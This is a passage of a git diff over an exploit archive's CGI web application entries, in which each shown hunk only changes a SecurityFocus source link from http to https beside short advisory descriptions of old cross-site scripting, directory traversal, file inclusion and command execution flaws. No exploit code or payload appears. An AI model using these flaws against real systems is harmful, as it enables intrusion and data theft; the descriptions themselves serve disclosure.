-source: http://www.securityfocus.com/bid/7530/info +source: https://www.securityfocus.com/bid/7530/info It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources. diff --git a/exploits/cgi/webapps/22588.txt b/exploits/cgi/webapps/22588.txt index 78df20918..3874eadca 100644 --- a/exploits/cgi/webapps/22588.txt +++ b/exploits/cgi/webapps/22588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7557/info +source: https://www.securityfocus.com/bid/7557/info IT has been reported that Happymall E-Commerce is prone to cross-site scripting attacks. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to execute arbitrary script code within the browser of a legitimate user visiting the site. diff --git a/exploits/cgi/webapps/22592.txt b/exploits/cgi/webapps/22592.txt index c2d69b7e3..4c2f2c160 100644 --- a/exploits/cgi/webapps/22592.txt +++ b/exploits/cgi/webapps/22592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7559/info +source: https://www.securityfocus.com/bid/7559/info IT has been reported that Happymall E-Commerce is prone to a file disclosure vulnerability. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to view the contents of sensitive system files. Files viewed in this manner would be accessed with the privileges of the Happymall process. diff --git a/exploits/cgi/webapps/22669.txt b/exploits/cgi/webapps/22669.txt index 378059e06..ce8027ba9 100644 --- a/exploits/cgi/webapps/22669.txt +++ b/exploits/cgi/webapps/22669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7729/info +source: https://www.securityfocus.com/bid/7729/info It has been reported that a cross-site scripting vulnerability exists in Bandmin. Because of this, an attacker may be able to execute script code or HTML in the context of the site hosting Bandmin by enticing a web user to follow a malicious link. diff --git a/exploits/cgi/webapps/22688.txt b/exploits/cgi/webapps/22688.txt index 703e56ef2..7d7433417 100644 --- a/exploits/cgi/webapps/22688.txt +++ b/exploits/cgi/webapps/22688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7747/info +source: https://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL. diff --git a/exploits/cgi/webapps/22689.txt b/exploits/cgi/webapps/22689.txt index f2d85737e..757dfb7f9 100644 --- a/exploits/cgi/webapps/22689.txt +++ b/exploits/cgi/webapps/22689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7747/info +source: https://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL. diff --git a/exploits/cgi/webapps/22692.txt b/exploits/cgi/webapps/22692.txt index f1284bdbd..5fb1cdc0b 100644 --- a/exploits/cgi/webapps/22692.txt +++ b/exploits/cgi/webapps/22692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7751/info +source: https://www.securityfocus.com/bid/7751/info The Zeus Web Server contains a web based administration interface that is vulnerable to cross site scripting attacks. diff --git a/exploits/cgi/webapps/22743.txt b/exploits/cgi/webapps/22743.txt index 55ea0166e..746e0981e 100644 --- a/exploits/cgi/webapps/22743.txt +++ b/exploits/cgi/webapps/22743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7828/info +source: https://www.securityfocus.com/bid/7828/info ImageFolio 'admin.cgi' has been reported prone to a directory traversal vulnerability. diff --git a/exploits/cgi/webapps/22770.txt b/exploits/cgi/webapps/22770.txt index 1fcfb6c36..809357e5d 100644 --- a/exploits/cgi/webapps/22770.txt +++ b/exploits/cgi/webapps/22770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7910/info +source: https://www.securityfocus.com/bid/7910/info Infinity CGI Exploit Scanner is reported to be prone to a cross-site scripting vulnerability. An attacker could exploit this issue to creating a malicious link to a site hosting the software that contains hostile HTML and script code. If this link is visited by a web user, the attacker-supplied code could be interpreted in their browser. diff --git a/exploits/cgi/webapps/22772.txt b/exploits/cgi/webapps/22772.txt index 37b9feb18..572b9bf09 100644 --- a/exploits/cgi/webapps/22772.txt +++ b/exploits/cgi/webapps/22772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7913/info +source: https://www.securityfocus.com/bid/7913/info Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process. diff --git a/exploits/cgi/webapps/22777.txt b/exploits/cgi/webapps/22777.txt index c475857d0..dd5e758fe 100644 --- a/exploits/cgi/webapps/22777.txt +++ b/exploits/cgi/webapps/22777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7920/info +source: https://www.securityfocus.com/bid/7920/info It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. diff --git a/exploits/cgi/webapps/22799.txt b/exploits/cgi/webapps/22799.txt index fbc0c94c8..fb9801037 100644 --- a/exploits/cgi/webapps/22799.txt +++ b/exploits/cgi/webapps/22799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7966/info +source: https://www.securityfocus.com/bid/7966/info Reportedly, Kerio Mailserver is vulnerable to a cross site-scripting attack. The vulnerability is present in the add_acl module of the Kerio Mailserver web mail component. diff --git a/exploits/cgi/webapps/22804.txt b/exploits/cgi/webapps/22804.txt index d90685d13..625825495 100644 --- a/exploits/cgi/webapps/22804.txt +++ b/exploits/cgi/webapps/22804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7968/info +source: https://www.securityfocus.com/bid/7968/info Reportedly, Kerio Mailserver is vulnerable to a cross site-scripting attack. The vulnerability is present in the do_map module of the Kerio Mailserver web mail component. diff --git a/exploits/cgi/webapps/22843.txt b/exploits/cgi/webapps/22843.txt index 41ee031e6..474e00eb2 100644 --- a/exploits/cgi/webapps/22843.txt +++ b/exploits/cgi/webapps/22843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8065/info +source: https://www.securityfocus.com/bid/8065/info MegaBook is prone to multiple HTML injection vulnerabilities. This is due to insufficient sanitization of HTML and script code from user-supplied input, including input supplied to the administrative login page and via the client HTTP User-Agent: header field. Exploitation of these issues could permit hostile HTML or script code to be injected into the guestbook system and rendered in the browser of a legitimate guestbook user. diff --git a/exploits/cgi/webapps/22963.txt b/exploits/cgi/webapps/22963.txt index bb75f55da..0e2b62219 100644 --- a/exploits/cgi/webapps/22963.txt +++ b/exploits/cgi/webapps/22963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8294/info +source: https://www.securityfocus.com/bid/8294/info Softshoe is allegedly prone to cross-site scripting attacks. An attacker can exploit this issue by creating a malicious link that contains hostile HTML or script code to a site that is hosting the vulnerable software. If such a link is visited, the attacker-supplied code may be rendered in the user's web browser. diff --git a/exploits/cgi/webapps/23021.txt b/exploits/cgi/webapps/23021.txt index 3970b33f6..c013d3180 100644 --- a/exploits/cgi/webapps/23021.txt +++ b/exploits/cgi/webapps/23021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8403/info +source: https://www.securityfocus.com/bid/8403/info It has been reported that a cross-site scripting issue exists in the search utility of the software. It is possible that an attacker may create a malicious link containing script code that could be executed in a user's browser. diff --git a/exploits/cgi/webapps/23025.txt b/exploits/cgi/webapps/23025.txt index 766862117..685056efe 100644 --- a/exploits/cgi/webapps/23025.txt +++ b/exploits/cgi/webapps/23025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8407/info +source: https://www.securityfocus.com/bid/8407/info SurgeLDAP is prone to cross-site scripting attacks. Remote attackers may exploit this issue by enticing a user to visiting a malicious link that includes hostile HTML and script code. This code may be rendered in the user's browser when the link is visited. diff --git a/exploits/cgi/webapps/23059.txt b/exploits/cgi/webapps/23059.txt index 49cd8b753..c30c79cbe 100644 --- a/exploits/cgi/webapps/23059.txt +++ b/exploits/cgi/webapps/23059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8490/info +source: https://www.securityfocus.com/bid/8490/info A vulnerability has been reported in Netbula Anyboard that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker. diff --git a/exploits/cgi/webapps/23085.html b/exploits/cgi/webapps/23085.html index 5f380a21a..d0139357f 100644 --- a/exploits/cgi/webapps/23085.html +++ b/exploits/cgi/webapps/23085.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8521/info +source: https://www.securityfocus.com/bid/8521/info Sitebuilder is said to be prone to a directory traversal vulnerability, potentially allowing users to disclose the contents of system files. The problem occurs due to the application failing to parse user-supplied input for directory traversal sequences (../) supplied to the 'sitebuilder.cgi' script, thus making it possible to access files outside of the established web root. diff --git a/exploits/cgi/webapps/23127.txt b/exploits/cgi/webapps/23127.txt index e88629c09..e3f459cdd 100644 --- a/exploits/cgi/webapps/23127.txt +++ b/exploits/cgi/webapps/23127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8573/info +source: https://www.securityfocus.com/bid/8573/info A cross-site scripting vulnerability has been reported for Escapade. The vulnerability exists due to insufficient sanitization of some user-supplied values. diff --git a/exploits/cgi/webapps/23128.txt b/exploits/cgi/webapps/23128.txt index 70d7f8f6e..bcfa214d7 100644 --- a/exploits/cgi/webapps/23128.txt +++ b/exploits/cgi/webapps/23128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8574/info +source: https://www.securityfocus.com/bid/8574/info Escapade is prone to a path disclosure vulnerability. It is possible to gain access to sensitive path information by issuing a request for an invalid resource, passed as a value for the PAGE parameter to the Escapade Scripting Engine. diff --git a/exploits/cgi/webapps/23153.txt b/exploits/cgi/webapps/23153.txt index 4d9b93447..a172bdc2b 100644 --- a/exploits/cgi/webapps/23153.txt +++ b/exploits/cgi/webapps/23153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8637/info +source: https://www.securityfocus.com/bid/8637/info A cross-site scripting problem has been reported in NetWin DBabble. This could make it possible for an attacker to potentially execute code in the security context of a site using the vulnerable software. This could be exploited by enticing a user to follow a malicious link to a site hosting the software. diff --git a/exploits/cgi/webapps/23214.txt b/exploits/cgi/webapps/23214.txt index c1b3d7ced..557b915e2 100644 --- a/exploits/cgi/webapps/23214.txt +++ b/exploits/cgi/webapps/23214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8757/info +source: https://www.securityfocus.com/bid/8757/info A problem with message.cgi script used by Cobalt RaQ appliances could lead to cross-site scripting. This could result in attacks attempting to steal authentication information. diff --git a/exploits/cgi/webapps/23217.txt b/exploits/cgi/webapps/23217.txt index 84b40c368..3573c0fee 100644 --- a/exploits/cgi/webapps/23217.txt +++ b/exploits/cgi/webapps/23217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8763/info +source: https://www.securityfocus.com/bid/8763/info It has been reported that Divine Content Server is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the 'pagename' attribute in the error page of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/cgi/webapps/23266.txt b/exploits/cgi/webapps/23266.txt index 9fc22e60f..26c16d738 100644 --- a/exploits/cgi/webapps/23266.txt +++ b/exploits/cgi/webapps/23266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8860/info +source: https://www.securityfocus.com/bid/8860/info Dansie Shopping Cart is reported to be prone to path disclosre issue in the 'db' parameter of 'cart.pl' that may lead to an attacker gaining sensitive information about the installation path of the system. diff --git a/exploits/cgi/webapps/23275.txt b/exploits/cgi/webapps/23275.txt index b0a0ed817..791177ce9 100644 --- a/exploits/cgi/webapps/23275.txt +++ b/exploits/cgi/webapps/23275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8876/info +source: https://www.securityfocus.com/bid/8876/info A problem has been reported in the handling of some types of input to DansGuardian. This problem may permit an attacker to launch cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23332.txt b/exploits/cgi/webapps/23332.txt index 77d2e1887..deafd8898 100644 --- a/exploits/cgi/webapps/23332.txt +++ b/exploits/cgi/webapps/23332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8958/info +source: https://www.securityfocus.com/bid/8958/info MPM Guestbook is reported to be prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of HTML from URI parameters, which will be displayed in web pages that are dynamically generated by the software. diff --git a/exploits/cgi/webapps/23367.txt b/exploits/cgi/webapps/23367.txt index 4490ef099..989949841 100644 --- a/exploits/cgi/webapps/23367.txt +++ b/exploits/cgi/webapps/23367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9000/info +source: https://www.securityfocus.com/bid/9000/info It has been reported that DailyDose may be prone to a remote command execution vulnerability due to insufficient sanitization of $temp variable in dose.pl script. An attacker may submit arbitrary commands that will be executed in the context of the web server hosting the vulnerable script. diff --git a/exploits/cgi/webapps/23370.txt b/exploits/cgi/webapps/23370.txt index 8e30ea81c..2f9795b6f 100644 --- a/exploits/cgi/webapps/23370.txt +++ b/exploits/cgi/webapps/23370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9004/info +source: https://www.securityfocus.com/bid/9004/info nCUBE Server Manager has been reported prone to a directory traversal vulnerability. The issue presents itself likely due to a lack of sufficient sanitization performed on URI parameters. A remote attacker may exploit this condition by supplying directory traversal sequences as a value for the affected URI parameter passed to a Server Manager script. Ultimately this may allow the attacker to break out of the webserver root and view arbitrary directory listings and potentially arbitrary files on the vulnerable system. diff --git a/exploits/cgi/webapps/23395.txt b/exploits/cgi/webapps/23395.txt index 8a6f9ab35..528a50aa8 100644 --- a/exploits/cgi/webapps/23395.txt +++ b/exploits/cgi/webapps/23395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9094/info +source: https://www.securityfocus.com/bid/9094/info It has been reported that CommerceSQL may be prone to a directory traversal vulnerability that may allow an attacker to gain access to sensitive information. The issue presents itself due to insufficient sanitization of user-supplied input. An attacker may traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23409.c b/exploits/cgi/webapps/23409.c index 93fd350b2..8343c5304 100644 --- a/exploits/cgi/webapps/23409.c +++ b/exploits/cgi/webapps/23409.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9139/info +// source: https://www.securityfocus.com/bid/9139/info A vulnerability has been reported in Jason Maloney's Guestbook that could result in remote command execution with the privileges of the web server. The problem occurs due to the application failing to sanitize sensitive script variables after handling POST requests. This could potentially result in the execution of arbitrary system executables. diff --git a/exploits/cgi/webapps/23410.txt b/exploits/cgi/webapps/23410.txt index 0dc7d6a5b..f309a40c5 100644 --- a/exploits/cgi/webapps/23410.txt +++ b/exploits/cgi/webapps/23410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9140/info +source: https://www.securityfocus.com/bid/9140/info IBM Directory Server is prone to cross-site scripting attacks via the web administrative interface. An attacker may be able to embed hostile HTML and script code in a malicious link to the server, which when followed will be rendered in the victim user's browser. This could allow the attacker to steal cookie-based authentication credentials or to launch other attacks. diff --git a/exploits/cgi/webapps/23418.pl b/exploits/cgi/webapps/23418.pl index 1aeb90fd4..566bd3744 100755 --- a/exploits/cgi/webapps/23418.pl +++ b/exploits/cgi/webapps/23418.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9169/info +source: https://www.securityfocus.com/bid/9169/info It has been reported that WebEye is prone to an information disclosure vulnerability that may allow an attacker to harvest sensitive information from the server such as usernames and passwords. The problem exists in the '/admin/wg_user-info.ml' script that fails to verify user credentials before returning sensitive information. diff --git a/exploits/cgi/webapps/23421.txt b/exploits/cgi/webapps/23421.txt index 2e56102fc..02ccdf24d 100644 --- a/exploits/cgi/webapps/23421.txt +++ b/exploits/cgi/webapps/23421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9180/info +source: https://www.securityfocus.com/bid/9180/info It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes. diff --git a/exploits/cgi/webapps/23432.txt b/exploits/cgi/webapps/23432.txt index c4b1e77f5..51935845a 100644 --- a/exploits/cgi/webapps/23432.txt +++ b/exploits/cgi/webapps/23432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9202/info +source: https://www.securityfocus.com/bid/9202/info RemotelyAnywhere has been reported prone to a logout message injection weakness. It has been reported that this issue presents itself due to a lack of sufficient restrictions performed by RemotelyAnywhere on user supplied 'reason' URI parameters. If a target user followed a malicious link, an attacker could potentially abuse this weakness, to include arbitrary messages in logout screens. This may aid in social engineering type attacks against the target user. diff --git a/exploits/cgi/webapps/23447.txt b/exploits/cgi/webapps/23447.txt index 61c7a498c..90839b957 100644 --- a/exploits/cgi/webapps/23447.txt +++ b/exploits/cgi/webapps/23447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9253/info +source: https://www.securityfocus.com/bid/9253/info It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver. diff --git a/exploits/cgi/webapps/23466.txt b/exploits/cgi/webapps/23466.txt index 3c6cfef02..5e5ac245b 100644 --- a/exploits/cgi/webapps/23466.txt +++ b/exploits/cgi/webapps/23466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9282/info +source: https://www.securityfocus.com/bid/9282/info It has been reported that QuikStore Shopping Cart may be prone to an information disclosure vulnerability due to insufficient sanitization of user-supplied data through the 'store' parameter of the 'quikstore.cgi' script. An attacker may dislcose the installation path of a file by making a malformed request and passing a single quote "'" character to generate an error message. The error message is reported to contain sensitive information such as the installation path. diff --git a/exploits/cgi/webapps/23467.txt b/exploits/cgi/webapps/23467.txt index 89fd6e33e..1939e2f77 100644 --- a/exploits/cgi/webapps/23467.txt +++ b/exploits/cgi/webapps/23467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9283/info +source: https://www.securityfocus.com/bid/9283/info It has been reported that QuikStore Shopping Cart may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '../' character sequences. The issue exists due to insufficient sanitization of user-supplied data through the 'template' parameter of the 'quikstore.cgi' script. This issue may also allow an attacker to carry out remote command execution by executing the vulnerable script and including malicious shell metacharacters and commands as a value for the 'template' parameter. diff --git a/exploits/cgi/webapps/23485.txt b/exploits/cgi/webapps/23485.txt index 3d89b1f8d..fd82e612e 100644 --- a/exploits/cgi/webapps/23485.txt +++ b/exploits/cgi/webapps/23485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9307/info +source: https://www.securityfocus.com/bid/9307/info Multiple cross-site scripting vulnerabilities have been reported in L-Soft Listserv. An attacker may exploit these issues by embedding hostile HTML and script code in a link to a site hosting the software. This could permit theft of cookie-based authentication credentials or other attacks. These issues could also provide an attack vector for latent vulnerabilities in web browser software. diff --git a/exploits/cgi/webapps/23488.txt b/exploits/cgi/webapps/23488.txt index 85f8c0c8f..94c089b67 100644 --- a/exploits/cgi/webapps/23488.txt +++ b/exploits/cgi/webapps/23488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9311/info +source: https://www.securityfocus.com/bid/9311/info It has been reported that BulletScript MailList may be prone to an information disclosure vulnerability that may allow remote attackers to gain access to sensitive information. The issue is reported to be present in the 'action' parameter of bsml.pl script. Information gathered via these attacks may aid an attacker in mounting further attacks against a vulnerable system and the affected users. diff --git a/exploits/cgi/webapps/23535.txt b/exploits/cgi/webapps/23535.txt index 12d33bbd9..376973ce1 100644 --- a/exploits/cgi/webapps/23535.txt +++ b/exploits/cgi/webapps/23535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9394/info +source: https://www.securityfocus.com/bid/9394/info A problem has been identified in the handling of input by scripts packaged with the DansGuardian Webmin Module. Because of this, it is possible for a remote to gain access to potentially sensitive information. diff --git a/exploits/cgi/webapps/23548.txt b/exploits/cgi/webapps/23548.txt index 2baa5c7d7..58ccacfe5 100644 --- a/exploits/cgi/webapps/23548.txt +++ b/exploits/cgi/webapps/23548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23549.txt b/exploits/cgi/webapps/23549.txt index c9e438718..baacce6ac 100644 --- a/exploits/cgi/webapps/23549.txt +++ b/exploits/cgi/webapps/23549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23550.txt b/exploits/cgi/webapps/23550.txt index 9e5d50712..9dcdaa046 100644 --- a/exploits/cgi/webapps/23550.txt +++ b/exploits/cgi/webapps/23550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23551.txt b/exploits/cgi/webapps/23551.txt index a716198ba..b76308dcc 100644 --- a/exploits/cgi/webapps/23551.txt +++ b/exploits/cgi/webapps/23551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting. diff --git a/exploits/cgi/webapps/23613.txt b/exploits/cgi/webapps/23613.txt index c6e69e9d3..e2d61ccea 100644 --- a/exploits/cgi/webapps/23613.txt +++ b/exploits/cgi/webapps/23613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9517/info +source: https://www.securityfocus.com/bid/9517/info Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information. diff --git a/exploits/cgi/webapps/23615.txt b/exploits/cgi/webapps/23615.txt index b1f2968fc..b3f8fd23f 100644 --- a/exploits/cgi/webapps/23615.txt +++ b/exploits/cgi/webapps/23615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9524/info +source: https://www.securityfocus.com/bid/9524/info It has been reported that PJ CGI Neo Review may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23629.txt b/exploits/cgi/webapps/23629.txt index 927b93257..2e27ed54b 100644 --- a/exploits/cgi/webapps/23629.txt +++ b/exploits/cgi/webapps/23629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9539/info +source: https://www.securityfocus.com/bid/9539/info Web Blog has been reported to be prone to a vulnerability that may permit remote attackers to execute arbitrary commands in the context of the hosting web server. This is due to insufficient sanitization of shell metacharacters from variables which will be used as an argument to a function that invokes the shell directly. diff --git a/exploits/cgi/webapps/23647.txt b/exploits/cgi/webapps/23647.txt index 4678db564..40aa76b12 100644 --- a/exploits/cgi/webapps/23647.txt +++ b/exploits/cgi/webapps/23647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9575/info +source: https://www.securityfocus.com/bid/9575/info The rxgoogle.cgi search script is prone to a cross-site scripting vulnerability because the software fails to sanitize user input and allows various metacharacters that may facilitate cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23659.txt b/exploits/cgi/webapps/23659.txt index b0e108214..9f19ac096 100644 --- a/exploits/cgi/webapps/23659.txt +++ b/exploits/cgi/webapps/23659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9598/info +source: https://www.securityfocus.com/bid/9598/info It has been reported that OpenJournal is prone to an authentication bypass vulnerability. This issue is caused by the application failing to properly sanitize URI specified parameters. Successful exploitation of this issue may lead to remote attackers gaining unauthorized access to online journal files associated with the application, adding new users to the database as well as a number of other possibilities. diff --git a/exploits/cgi/webapps/23705.txt b/exploits/cgi/webapps/23705.txt index b0fc588ab..57f4c66e9 100644 --- a/exploits/cgi/webapps/23705.txt +++ b/exploits/cgi/webapps/23705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9670/info +source: https://www.securityfocus.com/bid/9670/info It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input. diff --git a/exploits/cgi/webapps/23706.txt b/exploits/cgi/webapps/23706.txt index 7d6c83387..42ea0a845 100644 --- a/exploits/cgi/webapps/23706.txt +++ b/exploits/cgi/webapps/23706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9670/info +source: https://www.securityfocus.com/bid/9670/info It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input. diff --git a/exploits/cgi/webapps/23806.txt b/exploits/cgi/webapps/23806.txt index 940e073a2..fde0b64ab 100644 --- a/exploits/cgi/webapps/23806.txt +++ b/exploits/cgi/webapps/23806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9853/info +source: https://www.securityfocus.com/bid/9853/info It has been reported that cPanel may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data via the 'dir' parameter of 'dohtaccess.html' page. The victim may require to be authenticated with valid credentials to be exposed to exploitation. diff --git a/exploits/cgi/webapps/23807.txt b/exploits/cgi/webapps/23807.txt index b3fd761cd..25f050252 100644 --- a/exploits/cgi/webapps/23807.txt +++ b/exploits/cgi/webapps/23807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9855/info +source: https://www.securityfocus.com/bid/9855/info A potential remote command execution vulnerability has been discovered in the cPanel application. This issue occurs due to insufficient sanitization of externally supplied data to the login script. An attacker may exploit this problem by crafting a malicious URI request for the affected script; the attacker may then supply shell metacharacters and arbitrary commands as a value for the affected variable. diff --git a/exploits/cgi/webapps/23809.txt b/exploits/cgi/webapps/23809.txt index f3078bbc5..97846ff89 100644 --- a/exploits/cgi/webapps/23809.txt +++ b/exploits/cgi/webapps/23809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9861/info +source: https://www.securityfocus.com/bid/9861/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script. diff --git a/exploits/cgi/webapps/23810.txt b/exploits/cgi/webapps/23810.txt index ec0138558..9ae3b0543 100644 --- a/exploits/cgi/webapps/23810.txt +++ b/exploits/cgi/webapps/23810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9861/info +source: https://www.securityfocus.com/bid/9861/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script. diff --git a/exploits/cgi/webapps/23890.txt b/exploits/cgi/webapps/23890.txt index 5a2a97297..77d1f42b8 100644 --- a/exploits/cgi/webapps/23890.txt +++ b/exploits/cgi/webapps/23890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9995/info +source: https://www.securityfocus.com/bid/9995/info It has been reported that Fresh Guest Book is prone to a remote HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied form input. diff --git a/exploits/cgi/webapps/23894.txt b/exploits/cgi/webapps/23894.txt index 164afdfbf..34a0175b7 100644 --- a/exploits/cgi/webapps/23894.txt +++ b/exploits/cgi/webapps/23894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10000/info +source: https://www.securityfocus.com/bid/10000/info A vulnerability has been reported to exist in Cloisterblog that may allow a remote attacker to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data. The issue may allow a remote attacker to traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23897.txt b/exploits/cgi/webapps/23897.txt index dac8ed1b3..dce0a4397 100644 --- a/exploits/cgi/webapps/23897.txt +++ b/exploits/cgi/webapps/23897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10010/info +source: https://www.securityfocus.com/bid/10010/info It has been reported that LINBOX is prone to a remote authentication bypass vulnerability. This issue is due to a design error that would allow access to web based administration scripts without proper authorization. diff --git a/exploits/cgi/webapps/23907.pl b/exploits/cgi/webapps/23907.pl index b82badff1..87f11c6d9 100755 --- a/exploits/cgi/webapps/23907.pl +++ b/exploits/cgi/webapps/23907.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10040/info +source: https://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute 